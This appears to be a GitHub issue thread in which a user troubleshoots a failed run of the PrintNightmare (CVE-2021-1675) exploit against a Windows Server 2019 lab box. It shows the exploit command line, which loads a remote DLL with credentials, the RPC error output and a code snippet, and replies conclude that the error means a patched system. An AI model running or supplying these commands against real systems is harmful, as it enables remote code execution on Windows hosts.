Open Ach13v3-M0n7 opened 2 years ago
Maybe this still helps someone:
0x8001011b is the error code for RPC_E_ACCESS_DENIED. I know that this is an indication of a fixed system when returned for RpcAddPrinterDriver
(see, e.g., the functionality of https://github.com/ly4k/PrintNightmare).
In this case, the error is returned for RpcEnumPrinterDrivers
. I don't know in detail if this is also a valid sign of a patched system, but it does seem likely.
I am attempting the exploit from an Ubuntu 20 server against a standalone Windows Server 2019 box.
I have confirmed:
- SMB connectivity Ubuntu > Win19 and Win19 > Ubuntu.
- scan via rpcdump.py output returns
Protocol: [MS-RPRN]: Print System Remote Protocol
- Guest Login is enabled on Win19
The command I am running to throw the exploit is:
sudo python3 CVE-2021-1675.py 'notadmin:Password123!@10.209.1.1' '\\10.209.1.2\share\PrintNightmare.dll'
Output received back is:
[*] Connecting to ncacn_np:10.209.1.1[\PIPE\spoolss] [+] Bind OK [-] Failed to enumerate remote pDriverPath: RPRN Session Error: unkown error code: 0x8001011b
I notice in the source code, that this exception is on Line 174:
#find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path if not options.pDriverPath: try: blob = getDriver(dce, handle) pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL' if not "FileRepository" in pDriverPath: print("[-] pDriverPath {0}, expected :\\Windows\\System32\\DriverStore\\FileRepository\\.....".format(pDriverPath)) print("[-] Specify pDriverPath manually") sys.exit(1) except Exception as e: print('[-] Failed to enumerate remote pDriverPath') print(str(e)) sys.exit(1)
I manually checked my Win19 to see if I had the particular driver path, but I do not. I'm not sure if the lack of the particular driver could be the issue, but I have little more to go on than the "[-]" error line in my output.
Its been patched
I am attempting the exploit from an Ubuntu 20 server against a standalone Windows Server 2019 box.
I have confirmed:
Protocol: [MS-RPRN]: Print System Remote Protocol
The command I am running to throw the exploit is:
sudo python3 CVE-2021-1675.py 'notadmin:Password123!@10.209.1.1' '\\10.209.1.2\share\PrintNightmare.dll'
Output received back is:
I notice in the source code, that this exception is on Line 174:
I manually checked my Win19 to see if I had the particular driver path, but I do not. I'm not sure if the lack of the particular driver could be the issue, but I have little more to go on than the "[-]" error line in my output.